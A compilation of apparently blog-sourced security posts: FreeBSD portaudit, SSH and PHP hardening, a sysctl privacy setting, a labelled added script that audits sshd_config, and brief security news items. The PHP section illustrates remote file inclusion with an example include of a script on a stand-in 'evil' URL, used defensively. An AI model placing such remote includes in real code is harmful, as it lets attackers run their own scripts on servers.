FreeBSD Tools: portaudit – FreeBSD’s Third Party Security Audit
Portaudit is a software vulnerability auditing tool for FreeBSD systems. FreeBSD's Portaudit provides a system to check if installed ports are listed in a database of published security vulnerabilities.
The ports-mgmt/portaudit port polls a database for known security issues. This database is updated and maintained by the FreeBSD Security Team and ports developers.
To begin using Portaudit, install it from the Ports Collection:
cd /usr/ports/ports-mgmt/portaudit
make install clean
SSH Security Tips – OpenSSH hardening security
In this article I'll show you some tricks to help you secure your OpenSSH service. Here you will find useful information on how to secure sshd and prevent SSH dictionary attacks.
1. SSH security by tweaking sshd_config
The OpenSSH server configuration file is located in /etc/ssh/sshd_config. You need to restart sshd after every change you make to that file in order for changes to take effect.
- Change port number
Moving the SSH daemon off of port 22 protects you against automated attacks which assume that sshd is running on port 22.
Port 34912
- Allow only SSH protocol 2
Only SSH protocol version 2 connections should be permitted. Version 1 of the protocol contains security vulnerabilities. The default setting shipped in the configuration file is correct, but it's important to check.
Protocol 2
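A way to check an existing sshd_config for the two settings above, as an added example (not from the original article; the function names and sample configs are constructed for illustration). It assumes whitespace-separated keyword and value, and relies on sshd behaviour: every Port line adds a listener (22 when none is set), while for Protocol the first value obtained wins.

```sh
#!/bin/sh
# Print every value of keyword $2 found in the global section of file $1.
# Keywords are case-insensitive; parsing stops at the first Match block,
# because settings after it apply only conditionally.
sshd_values() {
    awk -v key="$2" '
        BEGIN { key = tolower(key) }
        /^[ \t]*#/ || /^[ \t]*$/ { next }   # skip comments and blank lines
        tolower($1) == "match" { exit }
        tolower($1) == key { print $2 }
    ' "$1"
}

# Return 0 if the config follows both tips, 1 otherwise (warnings on stdout).
audit_sshd_config() {
    cfg=$1
    rc=0
    ports=$(sshd_values "$cfg" Port)
    [ -n "$ports" ] || ports=22          # no Port line: sshd uses 22
    for p in $ports; do
        if [ "$p" = 22 ]; then
            echo "WARN: listening on default port 22"
            rc=1
        fi
    done
    proto=$(sshd_values "$cfg" Protocol | head -n 1)
    case $proto in
        2)  ;;
        "") echo "NOTE: Protocol not set; the installed version's default applies" ;;
        *)  echo "WARN: Protocol $proto permits SSH version 1"
            rc=1 ;;
    esac
    return $rc
}

# Constructed sample configs, not taken from a real host.
sample_weak() {
    printf '%s\n' '# constructed sample' 'port 22' 'Port 34912' 'Protocol 2,1'
}
sample_hardened() {
    printf '%s\n' 'Port 34912' 'Protocol 2' 'Match User backup' '    X11Forwarding no'
}

tmp=$(mktemp)
sample_weak > "$tmp"
audit_sshd_config "$tmp" || echo "weak sample: fails audit"
sample_hardened > "$tmp"
audit_sshd_config "$tmp" && echo "hardened sample: passes audit"
rm -f "$tmp"
```

On a live host, point audit_sshd_config at /etc/ssh/sshd_config; sshd -T prints the effective configuration if you want to cross-check.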
FreeBSD: How To Prevent Users from seeing information about processes owned by others
FreeBSD has a built-in security measure that stops users from seeing processes running under another UID, which prevents information snooping. To enable this security feature via sysctl, type the following commands:
sysctl security.bsd.see_other_uids=0
sysctl security.bsd.see_other_gids=0
To enable this security feature on boot, add the following lines to /etc/sysctl.conf:
# Hide UID and GID from other users
security.bsd.see_other_gids=0
security.bsd.see_other_uids=0
PHP Security Tips – Securing PHP by hardening PHP configuration
When it comes to security, ignorance is definitely not blissful. There are several methods to increase the security of your PHP environment.
In this article I will discuss how to secure PHP by hardening PHP 5 configuration.
1. allow_url_fopen (enabled by default)
This directive allows PHP's file functions (file_get_contents, include and require statements) to retrieve data from remote locations, like FTP or HTTP.
If an attacker can manipulate the arguments to those functions, they can use a URL under their control as the argument and run their own remote scripts. This vulnerability is called remote file inclusion (RFI).
; Disable allow_url_fopen in php.ini for security reasons
allow_url_fopen = Off
The setting can also be applied in Apache's httpd.conf:
# Disable allow_url_fopen for security reasons
php_admin_flag allow_url_fopen Off
This prevents URLs from being used as file arguments in PHP. A command like include("http://www.example.com/evil_script.php") will not be allowed to execute. Only files that reside within your site can be included: include("/var/www/html/config.inc.php").
“Smart” meters have security holes
SAN FRANCISCO — Computer-security researchers say new "smart" meters that are designed to help deliver electricity more efficiently also have flaws that could let hackers tamper with the power grid in previously impossible ways.
At the very least, the vulnerabilities open the door for attackers to jack up strangers' power bills. These flaws also could get hackers a key step closer to exploiting one of the most dangerous capabilities of the new technology, which is the ability to remotely turn someone else's power on and off.
Read more directly from the source.
China’s Great Firewall spreads overseas
A networking error has caused computers in Chile and the U.S. to come under the control of the Great Firewall of China, redirecting Facebook, Twitter, and YouTube users to Chinese servers.
Security experts are not sure exactly how this happened, but it appears that at least one ISP recently began fetching high-level DNS (domain name server) information from what's known as a root DNS server, based in China. That server, operated out of China by Swedish service provider Netnod, returned DNS information intended for Chinese users, effectively spreading China's network censorship overseas. China tightly controls access to a number of Web sites, using technology known colloquially as the Great Firewall of China.
Read more directly from the source.
Researchers Find Way To Zap RSA Algorithm
Three University of Michigan computer scientists say they have found a way to exploit a weakness in RSA security technology used to protect everything from media players to smartphones and e-commerce servers. Read more via networkworld.com.